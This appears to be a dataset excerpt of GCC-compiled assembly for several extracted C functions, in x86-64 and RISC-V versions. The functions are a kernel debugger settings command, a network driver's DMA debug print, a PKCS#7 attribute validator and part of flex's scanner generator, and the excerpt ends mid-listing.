.file "extr_kdb_cli.c_KdbpCmdSet_aug_v3_5.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "Available settings:\n" .align 3 .LC1: .string " syntax [intel|at&t]\n" .align 3 .LC2: .string " condition [exception|*] [first|last] [never|always|kmode|umode]\n" .align 3 .LC3: .string " break_on_module_load [true|false]\n" .align 3 .LC4: .string "syntax" .align 3 .LC5: .string "condition" .align 3 .LC6: .string "*" .align 3 .LC7: .string "Unknown exception '%s'.\n" .align 3 .LC8: .string "Condition for exception #%02d (%s): FirstChance %s LastChance %s\n" .align 3 .LC9: .string "Condition for all other exceptions: FirstChance %s LastChance %s\n" .align 3 .LC10: .string "break_on_module_load" .align 3 .LC11: .string "Unknown setting '%s'.\n" .text .align 1 .type KdbpCmdSet, @function KdbpCmdSet: addi sp,sp,-96 sd s1,72(sp) lla s1,.LANCHOR0 lw a5,0(s1) sd s2,64(sp) la s2,__stack_chk_guard sw a5,8(sp) sw a5,12(sp) sd ra,88(sp) sd s0,80(sp) sd s3,56(sp) sd s4,48(sp) sd s5,40(sp) ld a4, 0(s2) sd a4, 24(sp) li a4, 0 sd zero,16(sp) li a5,1 beq a0,a5,.L2 lla a0,.LC0 call KdbpPrint@plt lla a0,.LC1 call KdbpPrint@plt lla a0,.LC2 call KdbpPrint@plt lla a0,.LC3 call KdbpPrint@plt .L3: lw a0,4(s1) .L11: ld a4, 24(sp) ld a5, 0(s2) xor a5, a4, a5 li a4, 0 bne a5,zero,.L26 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) addi sp,sp,96 jr ra .L2: ld a0,8(a1) mv s0,a1 lla a1,.LC4 call strcmp@plt beq a0,zero,.L3 ld a0,8(s0) lla a1,.LC5 call strcmp@plt bne a0,zero,.L5 ld a0,16(s0) lla a1,.LC6 call strcmp@plt beq a0,zero,.L17 ld a0,16(s0) li a2,0 addi a1,sp,16 call strtoul@plt ld a4,16(s0) ld a5,16(sp) mv s3,a0 beq a4,a5,.L27 .L7: lla a0,.LANCHOR1 call RTL_NUMBER_OF@plt ble a0,s3,.L28 .L6: lw a1,4(s1) addi a2,sp,8 mv a0,s3 call KdbpGetEnterCondition@plt beq a0,zero,.L29 .L12: lw a1,8(s1) addi a2,sp,12 mv a0,s3 call KdbpGetEnterCondition@plt beq a0,zero,.L30 .L13: lla s0,.LANCHOR1 mv a0,s0 call RTL_NUMBER_OF@plt addiw a0,a0,-1 ble a0,s3,.L14 lw a0,8(sp) slli a5,s3,3 add s0,s0,a5 ld s4,0(s0) call KDB_ENTER_CONDITION_TO_STRING@plt mv s0,a0 lw a0,12(sp) call KDB_ENTER_CONDITION_TO_STRING@plt mv a4,a0 mv a3,s0 mv a2,s4 mv a1,s3 lla a0,.LC8 call KdbpPrint@plt j .L3 .L5: ld a0,8(s0) lla a1,.LC10 call strcmp@plt beq a0,zero,.L3 ld a1,8(s0) lla a0,.LC11 call KdbpPrint@plt j .L3 .L17: li s3,-1 j .L6 .L14: lw a0,8(sp) call KDB_ENTER_CONDITION_TO_STRING@plt mv s0,a0 lw a0,12(sp) call KDB_ENTER_CONDITION_TO_STRING@plt mv a2,a0 mv a1,s0 lla a0,.LC9 call KdbpPrint@plt j .L3 .L30: lw a0,8(s1) call ASSERT@plt j .L13 .L29: lw a0,8(s1) call ASSERT@plt j .L12 .L27: lla s4,.LANCHOR1 li s3,0 mv s5,s4 j .L8 .L10: ld a0,0(s4) beq a0,zero,.L9 ld a1,16(s0) call _stricmp@plt .L9: addiw s3,s3,1 addi s4,s4,8 .L8: mv a0,s5 call RTL_NUMBER_OF@plt bgt a0,s3,.L10 j .L7 .L28: ld a1,16(s0) lla a0,.LC7 call KdbpPrint@plt lw a0,4(s1) j .L11 .L26: call __stack_chk_fail@plt .size KdbpCmdSet, .-KdbpCmdSet .section .rodata.str1.8 .align 3 .LC12: .string "ZERODEVIDE" .align 3 .LC13: .string "DEBUGTRAP" .align 3 .LC14: .string "NMI" .align 3 .LC15: .string "INT3" .align 3 .LC16: .string "OVERFLOW" .align 3 .LC17: .string "BOUND" .align 3 .LC18: .string "INVALIDOP" .align 3 .LC19: .string "NOMATHCOP" .align 3 .LC20: .string "DOUBLEFAULT" .align 3 .LC21: .string "RESERVED(9)" .align 3 .LC22: .string "INVALIDTSS" .align 3 .LC23: .string "SEGMENTNOTPRESENT" .align 3 .LC24: .string "STACKFAULT" .align 3 .LC25: .string "GPF" .align 3 .LC26: .string "PAGEFAULT" .align 3 .LC27: .string "RESERVED(15)" .align 3 .LC28: .string "MATHFAULT" .align 3 .LC29: .string "ALIGNMENTCHECK" .align 3 .LC30: .string "MACHINECHECK" .align 3 .LC31: .string "SIMDFAULT" .align 3 .LC32: .string "OTHERS" .globl TRUE .globl KdbUseIntelSyntax .globl KdbEnterFromUmode .globl KdbEnterFromKmode .globl KdbEnterAlways .globl KdbDoNotEnter .globl KdbBreakOnModuleLoad .globl FALSE .bss .align 2 .set .LANCHOR0,. + 0 .type KdbDoNotEnter, @object .size KdbDoNotEnter, 4 KdbDoNotEnter: .zero 4 .type TRUE, @object .size TRUE, 4 TRUE: .zero 4 .type FALSE, @object .size FALSE, 4 FALSE: .zero 4 .type KdbUseIntelSyntax, @object .size KdbUseIntelSyntax, 4 KdbUseIntelSyntax: .zero 4 .type KdbEnterFromUmode, @object .size KdbEnterFromUmode, 4 KdbEnterFromUmode: .zero 4 .type KdbEnterFromKmode, @object .size KdbEnterFromKmode, 4 KdbEnterFromKmode: .zero 4 .type KdbEnterAlways, @object .size KdbEnterAlways, 4 KdbEnterAlways: .zero 4 .type KdbBreakOnModuleLoad, @object .size KdbBreakOnModuleLoad, 4 KdbBreakOnModuleLoad: .zero 4 .section .data.rel.ro.local,"aw" .align 3 .set .LANCHOR1,. + 0 .type ExceptionNames.0, @object .size ExceptionNames.0, 168 ExceptionNames.0: .dword .LC12 .dword .LC13 .dword .LC14 .dword .LC15 .dword .LC16 .dword .LC17 .dword .LC18 .dword .LC19 .dword .LC20 .dword .LC21 .dword .LC22 .dword .LC23 .dword .LC24 .dword .LC25 .dword .LC26 .dword .LC27 .dword .LC28 .dword .LC29 .dword .LC30 .dword .LC31 .dword .LC32 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_bnx2x_main.c_bnx2x_dp_dmae_aug_v3_1
.file "extr_bnx2x_main.c_bnx2x_dp_dmae_aug_v3_1.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "DMAE: opcode 0x%08x\nsrc [%x:%08x], len [%d*4], dst [%x:%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 8 .LC1: .string "DMAE: opcode 0x%08x\nsrc [%08x], len [%d*4], dst [%x:%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 8 .LC2: .string "DMAE: opcode 0x%08x\nsrc [%x:%08x], len [%d*4], dst_addr [%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 8 .LC3: .string "DMAE: opcode 0x%08x\nsrc [%08x], len [%d*4], dst [%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC4: .string "DMAE RAW [%02d]: 0x%08x\n" .section .rodata.str1.8 .align 8 .LC5: .string "DMAE: opcode 0x%08x\nsrc_addr [%x:%08x] len [%d * 4] dst_addr [none]\ncomp_addr [%x:%08x] comp_val 0x%08x\n" .align 8 .LC6: .string "DMAE: opcode 0x%08x\nsrc_addr [%08x] len [%d * 4] dst_addr [none]\ncomp_addr [%x:%08x] comp_val 0x%08x\n" .text .p2align 4 .type bnx2x_dp_dmae, @function bnx2x_dp_dmae: .LFB25: .cfi_startproc endbr64 movl DMAE_COMMAND_DST(%rip), %eax movl DMAE_CMD_SRC_PCI(%rip), %r11d pushq %r12 .cfi_def_cfa_offset 16 .cfi_offset 12, -16 pushq %rbp .cfi_def_cfa_offset 24 .cfi_offset 6, -24 movl %edx, %ebp movl DMAE_COMMAND_SRC(%rip), %r12d pushq %rbx .cfi_def_cfa_offset 32 .cfi_offset 3, -32 movl (%rsi), %edx movq %rsi, %rbx movl 12(%rsi), %r10d movl 16(%rsi), %edi andl %edx, %eax movl 20(%rsi), %esi movl 24(%rbx), %r8d andl %edx, %r12d movl 4(%rbx), %ecx cmpl $128, %eax je .L2 cmpl $129, %eax je .L3 cmpl %r11d, %r12d je .L12 pushq %r10 .cfi_def_cfa_offset 40 movl %esi, %r9d sarl $2, %ecx leaq .LC6(%rip), %rsi pushq %rdi .cfi_def_cfa_offset 48 xorl %eax, %eax movl %ebp, %edi call DP@PLT popq %rax .cfi_def_cfa_offset 40 popq %rdx .cfi_def_cfa_offset 32 .L6: movl (%rbx), %ecx movl %ebp, %edi popq %rbx .cfi_remember_state .cfi_def_cfa_offset 24 xorl %edx, %edx popq %rbp .cfi_def_cfa_offset 16 leaq .LC4(%rip), %rsi xorl %eax, %eax popq %r12 .cfi_def_cfa_offset 8 jmp DP@PLT .p2align 4,,10 .p2align 3 .L2: .cfi_restore_state movl 32(%rbx), %r9d movl 8(%rbx), %eax cmpl %r11d, %r12d je .L13 pushq %r10 .cfi_def_cfa_offset 40 sarl $2, %ecx pushq %rdi .cfi_def_cfa_offset 48 movl %ebp, %edi pushq %rsi .cfi_def_cfa_offset 56 leaq .LC1(%rip), %rsi pushq %rax .cfi_def_cfa_offset 64 xorl %eax, %eax call DP@PLT addq $32, %rsp .cfi_def_cfa_offset 32 jmp .L6 .p2align 4,,10 .p2align 3 .L3: movl 8(%rbx), %r9d sarl $2, %r9d cmpl %r11d, %r12d je .L14 subq $8, %rsp .cfi_def_cfa_offset 40 sarl $2, %ecx xorl %eax, %eax pushq %r10 .cfi_def_cfa_offset 48 pushq %rdi .cfi_def_cfa_offset 56 movl %ebp, %edi pushq %rsi .cfi_def_cfa_offset 64 leaq .LC3(%rip), %rsi call DP@PLT addq $32, %rsp .cfi_def_cfa_offset 32 jmp .L6 .p2align 4,,10 .p2align 3 .L12: subq $8, %rsp .cfi_def_cfa_offset 40 movl 28(%rbx), %r11d movl %r8d, %r9d xorl %eax, %eax pushq %r10 .cfi_def_cfa_offset 48 movl %ecx, %r8d pushq %rdi .cfi_def_cfa_offset 56 movl %r11d, %ecx movl %ebp, %edi pushq %rsi .cfi_def_cfa_offset 64 leaq .LC5(%rip), %rsi call DP@PLT addq $32, %rsp .cfi_def_cfa_offset 32 jmp .L6 .p2align 4,,10 .p2align 3 .L14: pushq %r10 .cfi_def_cfa_offset 40 movl 28(%rbx), %r11d xorl %eax, %eax pushq %rdi .cfi_def_cfa_offset 48 movl %ebp, %edi pushq %rsi .cfi_def_cfa_offset 56 leaq .LC2(%rip), %rsi pushq %r9 .cfi_def_cfa_offset 64 movl %r8d, %r9d movl %ecx, %r8d movl %r11d, %ecx call DP@PLT addq $32, %rsp .cfi_def_cfa_offset 32 jmp .L6 .p2align 4,,10 .p2align 3 .L13: subq $8, %rsp .cfi_def_cfa_offset 40 movl 28(%rbx), %r11d pushq %r10 .cfi_def_cfa_offset 48 pushq %rdi .cfi_def_cfa_offset 56 movl %ebp, %edi pushq %rsi .cfi_def_cfa_offset 64 leaq .LC0(%rip), %rsi pushq %rax .cfi_def_cfa_offset 72 xorl %eax, %eax pushq %r9 .cfi_def_cfa_offset 80 movl %r8d, %r9d movl %ecx, %r8d movl %r11d, %ecx call DP@PLT addq $48, %rsp .cfi_def_cfa_offset 32 jmp .L6 .cfi_endproc .LFE25: .size bnx2x_dp_dmae, .-bnx2x_dp_dmae .globl DMAE_COMMAND_SRC .bss .align 4 .type DMAE_COMMAND_SRC, @object .size DMAE_COMMAND_SRC, 4 DMAE_COMMAND_SRC: .zero 4 .globl DMAE_COMMAND_DST .align 4 .type DMAE_COMMAND_DST, @object .size DMAE_COMMAND_DST, 4 DMAE_COMMAND_DST: .zero 4 .globl DMAE_CMD_SRC_PCI .align 4 .type DMAE_CMD_SRC_PCI, @object .size DMAE_CMD_SRC_PCI, 4 DMAE_CMD_SRC_PCI: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_bnx2x_main.c_bnx2x_dp_dmae_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "DMAE: opcode 0x%08x\nsrc [%x:%08x], len [%d*4], dst [%x:%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 3 .LC1: .string "DMAE: opcode 0x%08x\nsrc [%08x], len [%d*4], dst [%x:%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 3 .LC2: .string "DMAE: opcode 0x%08x\nsrc [%x:%08x], len [%d*4], dst_addr [%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 3 .LC3: .string "DMAE: opcode 0x%08x\nsrc [%08x], len [%d*4], dst [%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 3 .LC4: .string "DMAE RAW [%02d]: 0x%08x\n" .align 3 .LC5: .string "DMAE: opcode 0x%08x\nsrc_addr [%x:%08x] len [%d * 4] dst_addr [none]\ncomp_addr [%x:%08x] comp_val 0x%08x\n" .align 3 .LC6: .string "DMAE: opcode 0x%08x\nsrc_addr [%08x] len [%d * 4] dst_addr [none]\ncomp_addr [%x:%08x] comp_val 0x%08x\n" .text .align 1 .type bnx2x_dp_dmae, @function bnx2x_dp_dmae: addi sp,sp,-64 lla a5,.LANCHOR0 lw a3,4(a5) sd s0,48(sp) mv s0,a1 lw a1,0(a1) lw a0,0(a5) sd s1,40(sp) sd ra,56(sp) and a3,a1,a3 li t1,128 lw t6,8(a5) lw t3,4(s0) lw a4,24(s0) lw t4,20(s0) lw t5,16(s0) lw a7,12(s0) mv s1,a2 and a0,a1,a0 beq a3,t1,.L2 li a2,129 beq a3,a2,.L3 beq a0,t6,.L12 mv a2,a1 mv a6,t5 mv a5,t4 srai a3,t3,2 lla a1,.LC6 mv a0,s1 call DP@plt .L6: lw a3,0(s0) ld s0,48(sp) ld ra,56(sp) mv a0,s1 ld s1,40(sp) li a2,0 lla a1,.LC4 addi sp,sp,64 tail DP@plt .L2: lw a5,32(s0) lw a6,8(s0) beq a0,t6,.L13 sd a7,8(sp) mv a2,a1 sd t5,0(sp) mv a7,t4 srai a3,t3,2 lla a1,.LC1 mv a0,s1 call DP@plt j .L6 .L3: lw a5,8(s0) srai a5,a5,2 beq a0,t6,.L14 sd a7,0(sp) mv a2,a1 mv a7,t5 mv a6,t4 srai a3,t3,2 lla a1,.LC3 mv a0,s1 call DP@plt j .L6 .L12: lw a3,28(s0) mv a5,a4 sd a7,0(sp) mv a2,a1 mv a7,t5 mv a6,t4 mv a4,t3 lla a1,.LC5 mv a0,s1 call DP@plt j .L6 .L14: lw a3,28(s0) mv a6,a5 sd a7,8(sp) mv a5,a4 mv a2,a1 sd t5,0(sp) mv a7,t4 mv a4,t3 lla a1,.LC2 mv a0,s1 call DP@plt j .L6 .L13: lw a3,28(s0) mv a2,a1 sd a7,16(sp) sd t5,8(sp) mv a7,a6 sd t4,0(sp) mv a6,a5 lla a1,.LC0 mv a5,a4 mv a0,s1 mv a4,t3 call DP@plt j .L6 .size bnx2x_dp_dmae, .-bnx2x_dp_dmae .globl DMAE_COMMAND_SRC .globl DMAE_COMMAND_DST .globl DMAE_CMD_SRC_PCI .bss .align 2 .set .LANCHOR0,. + 0 .type DMAE_COMMAND_SRC, @object .size DMAE_COMMAND_SRC, 4 DMAE_COMMAND_SRC: .zero 4 .type DMAE_COMMAND_DST, @object .size DMAE_COMMAND_DST, 4 DMAE_COMMAND_DST: .zero 4 .type DMAE_CMD_SRC_PCI, @object .size DMAE_CMD_SRC_PCI, 4 DMAE_CMD_SRC_PCI: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_pkcs7_parser.c_pkcs7_sig_note_authenticated_attr_aug_v3_4
.file "extr_pkcs7_parser.c_pkcs7_sig_note_authenticated_attr_aug_v3_4.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "AuthAttr: %02x %zu [%*ph]\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "Mismatch between global data type (%d) and sinfo %u (%d)\n" .align 8 .LC2: .string "S/MIME Caps only allowed with Authenticode\n" .align 8 .LC3: .string "Authenticode AuthAttrs only allowed with Authenticode\n" .align 8 .LC4: .string "Repeated/multivalue AuthAttrs not permitted\n" .section .text.unlikely,"ax",@progbits .LCOLDB5: .text .LHOTB5: .p2align 4 .globl pkcs7_sig_note_authenticated_attr .type pkcs7_sig_note_authenticated_attr, @function pkcs7_sig_note_authenticated_attr: .LFB25: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 movq %rcx, %r15 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 movq %r8, %r14 movq %rcx, %r8 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 movl %r14d, %ecx pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movzbl %dl, %r12d pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movl %edx, %ebp movq %r14, %rdx pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 movq %rdi, %rbx subq $24, %rsp .cfi_def_cfa_offset 80 movq 16(%rdi), %r13 leaq .LC0(%rip), %rdi movq %rsi, 8(%rsp) movl %r12d, %esi call pr_devel@PLT movl (%rbx), %eax addl $-128, %eax cmpl $5, %eax ja .L16 leaq .L4(%rip), %rdx leaq 8(%r13), %rsi movslq (%rdx,%rax,4), %rax addq %rdx, %rax notrack jmp *%rax .section .rodata .align 4 .align 4 .L4: .long .L9-.L4 .long .L8-.L4 .long .L7-.L4 .long .L6-.L4 .long .L5-.L4 .long .L3-.L4 .text .p2align 4,,10 .p2align 3 .L5: movl sinfo_has_message_digest(%rip), %edi call __test_and_set_bit@PLT testl %eax, %eax jne .L10 cmpb %bpl, ASN1_OTS(%rip) je .L12 movl EBADMSG(%rip), %eax negl %eax jmp .L1 .p2align 4,,10 .p2align 3 .L3: movl sinfo_has_content_type(%rip), %edi call __test_and_set_bit@PLT testl %eax, %eax jne .L10 movq %r14, %rsi movq %r15, %rdi call look_up_OID@PLT movl %eax, %ecx movq 8(%rbx), %rax movl (%rax), %esi cmpl %esi, %ecx jne .L11 .L13: addq $24, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L9: .cfi_restore_state movl sinfo_has_smime_caps(%rip), %edi call __test_and_set_bit@PLT testl %eax, %eax jne .L10 movq 8(%rbx), %rax movl OID_msIndirectData(%rip), %ebx cmpl %ebx, (%rax) je .L13 leaq .LC2(%rip), %rdi xorl %eax, %eax call pr_warn@PLT movl EKEYREJECTED(%rip), %eax negl %eax jmp .L1 .p2align 4,,10 .p2align 3 .L7: movl sinfo_has_ms_statement_type(%rip), %edi call __test_and_set_bit@PLT testl %eax, %eax jne .L10 .L15: movq 8(%rbx), %rax movl OID_msIndirectData(%rip), %ebx cmpl %ebx, (%rax) je .L13 leaq .LC3(%rip), %rdi xorl %eax, %eax call pr_warn@PLT movl EKEYREJECTED(%rip), %eax negl %eax jmp .L1 .p2align 4,,10 .p2align 3 .L6: movl sinfo_has_ms_opus_info(%rip), %edi call __test_and_set_bit@PLT testl %eax, %eax je .L15 .p2align 4,,10 .p2align 3 .L10: leaq .LC4(%rip), %rdi xorl %eax, %eax call pr_warn@PLT movl EKEYREJECTED(%rip), %eax negl %eax .L1: addq $24, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L8: .cfi_restore_state movl sinfo_has_signing_time(%rip), %edi call __test_and_set_bit@PLT testl %eax, %eax jne .L10 movq 8(%rsp), %rsi addq $24, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 leaq 24(%r13), %rdi movq %r14, %r8 popq %rbx .cfi_def_cfa_offset 48 movq %r15, %rcx popq %rbp .cfi_def_cfa_offset 40 movl %r12d, %edx popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 jmp x509_decode_time@PLT .p2align 4,,10 .p2align 3 .L12: .cfi_restore_state movq %r15, 16(%r13) movq %r14, 0(%r13) jmp .L1 .p2align 4,,10 .p2align 3 .L11: movl 28(%r13), %edx leaq .LC1(%rip), %rdi xorl %eax, %eax call pr_warn@PLT movl EBADMSG(%rip), %eax negl %eax jmp .L1 .cfi_endproc .section .text.unlikely .cfi_startproc .type pkcs7_sig_note_authenticated_attr.cold, @function pkcs7_sig_note_authenticated_attr.cold: .LFSB25: .L16: .cfi_def_cfa_offset 80 .cfi_offset 3, -56 .cfi_offset 6, -48 .cfi_offset 12, -40 .cfi_offset 13, -32 .cfi_offset 14, -24 .cfi_offset 15, -16 xorl %eax, %eax jmp .L1 .cfi_endproc .LFE25: .text .size pkcs7_sig_note_authenticated_attr, .-pkcs7_sig_note_authenticated_attr .section .text.unlikely .size pkcs7_sig_note_authenticated_attr.cold, .-pkcs7_sig_note_authenticated_attr.cold .LCOLDE5: .text .LHOTE5: .globl sinfo_has_smime_caps .bss .align 4 .type sinfo_has_smime_caps, @object .size sinfo_has_smime_caps, 4 sinfo_has_smime_caps: .zero 4 .globl sinfo_has_signing_time .align 4 .type sinfo_has_signing_time, @object .size sinfo_has_signing_time, 4 sinfo_has_signing_time: .zero 4 .globl sinfo_has_ms_statement_type .align 4 .type sinfo_has_ms_statement_type, @object .size sinfo_has_ms_statement_type, 4 sinfo_has_ms_statement_type: .zero 4 .globl sinfo_has_ms_opus_info .align 4 .type sinfo_has_ms_opus_info, @object .size sinfo_has_ms_opus_info, 4 sinfo_has_ms_opus_info: .zero 4 .globl sinfo_has_message_digest .align 4 .type sinfo_has_message_digest, @object .size sinfo_has_message_digest, 4 sinfo_has_message_digest: .zero 4 .globl sinfo_has_content_type .align 4 .type sinfo_has_content_type, @object .size sinfo_has_content_type, 4 sinfo_has_content_type: .zero 4 .globl OID_msIndirectData .align 4 .type OID_msIndirectData, @object .size OID_msIndirectData, 4 OID_msIndirectData: .zero 4 .globl EKEYREJECTED .align 4 .type EKEYREJECTED, @object .size EKEYREJECTED, 4 EKEYREJECTED: .zero 4 .globl EBADMSG .align 4 .type EBADMSG, @object .size EBADMSG, 4 EBADMSG: .zero 4 .globl ASN1_OTS .type ASN1_OTS, @object .size ASN1_OTS, 1 ASN1_OTS: .zero 1 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_pkcs7_parser.c_pkcs7_sig_note_authenticated_attr_aug_v3_4.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "AuthAttr: %02x %zu [%*ph]\n" .align 3 .LC1: .string "Mismatch between global data type (%d) and sinfo %u (%d)\n" .align 3 .LC2: .string "S/MIME Caps only allowed with Authenticode\n" .align 3 .LC3: .string "Authenticode AuthAttrs only allowed with Authenticode\n" .align 3 .LC4: .string "Repeated/multivalue AuthAttrs not permitted\n" .text .align 1 .globl pkcs7_sig_note_authenticated_attr .type pkcs7_sig_note_authenticated_attr, @function pkcs7_sig_note_authenticated_attr: addi sp,sp,-64 sd s4,16(sp) sd s5,8(sp) mv s4,a4 mv s5,a2 sd s0,48(sp) sd s1,40(sp) mv s0,a0 sd s2,32(sp) mv a4,a3 mv s1,a3 mv s2,a1 sext.w a3,s4 mv a2,s4 mv a1,s5 lla a0,.LC0 sd s3,24(sp) sd ra,56(sp) ld s3,16(s0) sd s6,0(sp) call pr_devel@plt lw a5,0(s0) li a3,5 addiw a5,a5,-128 sext.w a0,a5 bgtu a0,a3,.L16 slli a4,a5,32 lla a3,.L4 srli a5,a4,30 add a5,a5,a3 lw a5,0(a5) lla s6,.LANCHOR0 add a5,a5,a3 jr a5 .section .rodata .align 2 .align 2 .L4: .word .L9-.L4 .word .L8-.L4 .word .L7-.L4 .word .L6-.L4 .word .L5-.L4 .word .L3-.L4 .text .L9: lw a0,20(s6) addi a1,s3,8 call __test_and_set_bit@plt bne a0,zero,.L10 ld a4,8(s0) lw a5,24(s6) lw a4,0(a4) bne a4,a5,.L19 .L16: li a0,0 .L2: ld ra,56(sp) ld s0,48(sp) ld s1,40(sp) ld s2,32(sp) ld s3,24(sp) ld s4,16(sp) ld s5,8(sp) ld s6,0(sp) addi sp,sp,64 jr ra .L5: lw a0,12(s6) addi a1,s3,8 call __test_and_set_bit@plt bne a0,zero,.L10 lbu a5,16(s6) beq a5,s5,.L12 lw a0,4(s6) negw a0,a0 j .L2 .L3: lw a0,0(s6) addi a1,s3,8 call __test_and_set_bit@plt bne a0,zero,.L10 mv a1,s4 mv a0,s1 call look_up_OID@plt ld a5,8(s0) lw a1,0(a5) beq a0,a1,.L16 lw a2,28(s3) sext.w a3,a0 lla a0,.LC1 call pr_warn@plt lw a0,4(s6) negw a0,a0 j .L2 .L8: lw a0,8(s6) addi a1,s3,8 call __test_and_set_bit@plt bne a0,zero,.L10 ld s0,48(sp) ld ra,56(sp) ld s6,0(sp) mv a4,s4 mv a3,s1 ld s4,16(sp) ld s1,40(sp) mv a2,s5 mv a1,s2 ld s5,8(sp) ld s2,32(sp) addi a0,s3,24 ld s3,24(sp) addi sp,sp,64 tail x509_decode_time@plt .L7: lw a0,36(s6) addi a1,s3,8 call __test_and_set_bit@plt bne a0,zero,.L10 .L15: ld a4,8(s0) lw a5,24(s6) lw a4,0(a4) beq a4,a5,.L16 lla a0,.LC3 call pr_warn@plt lw a0,28(s6) negw a0,a0 j .L2 .L6: lw a0,32(s6) addi a1,s3,8 call __test_and_set_bit@plt beq a0,zero,.L15 .L10: lla a0,.LC4 call pr_warn@plt lw a0,28(s6) negw a0,a0 j .L2 .L12: sd s1,16(s3) sd s4,0(s3) j .L2 .L19: lla a0,.LC2 call pr_warn@plt lw a0,28(s6) negw a0,a0 j .L2 .size pkcs7_sig_note_authenticated_attr, .-pkcs7_sig_note_authenticated_attr .globl sinfo_has_smime_caps .globl sinfo_has_signing_time .globl sinfo_has_ms_statement_type .globl sinfo_has_ms_opus_info .globl sinfo_has_message_digest .globl sinfo_has_content_type .globl OID_msIndirectData .globl EKEYREJECTED .globl EBADMSG .globl ASN1_OTS .bss .align 2 .set .LANCHOR0,. + 0 .type sinfo_has_content_type, @object .size sinfo_has_content_type, 4 sinfo_has_content_type: .zero 4 .type EBADMSG, @object .size EBADMSG, 4 EBADMSG: .zero 4 .type sinfo_has_signing_time, @object .size sinfo_has_signing_time, 4 sinfo_has_signing_time: .zero 4 .type sinfo_has_message_digest, @object .size sinfo_has_message_digest, 4 sinfo_has_message_digest: .zero 4 .type ASN1_OTS, @object .size ASN1_OTS, 1 ASN1_OTS: .zero 1 .zero 3 .type sinfo_has_smime_caps, @object .size sinfo_has_smime_caps, 4 sinfo_has_smime_caps: .zero 4 .type OID_msIndirectData, @object .size OID_msIndirectData, 4 OID_msIndirectData: .zero 4 .type EKEYREJECTED, @object .size EKEYREJECTED, 4 EKEYREJECTED: .zero 4 .type sinfo_has_ms_opus_info, @object .size sinfo_has_ms_opus_info, 4 sinfo_has_ms_opus_info: .zero 4 .type sinfo_has_ms_statement_type, @object .size sinfo_has_ms_statement_type, 4 sinfo_has_ms_statement_type: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_gen.c_gen_next_match_aug_v3_6
.file "extr_gen.c_gen_next_match_aug_v3_6.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "YY_SC_TO_UI(*yy_cp)" .LC1: .string "YY_SC_TO_UI(*++yy_cp)" .LC2: .string "yy_ec[YY_SC_TO_UI(*yy_cp)] " .LC3: .string "yy_ec[YY_SC_TO_UI(*--yy_cp)] " .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC4: .string "while ( (yy_current_state = yy_nxt[yy_current_state][ %s ]) > 0 )" .align 8 .LC5: .string "while ( (yy_current_state = yy_nxt[yy_current_state*YY_NXT_LOLEN + %s ]) > 0 )" .section .rodata.str1.1 .LC6: .string "{" .LC7: .string "++yy_cp;" .LC8: .string "}" .section .rodata.str1.8 .align 8 .LC9: .string "yy_current_state = -yy_current_state;" .align 8 .LC10: .string "yyconst struct yy_trans_info *yy_trans_info;\n" .section .rodata.str1.1 .LC11: .string 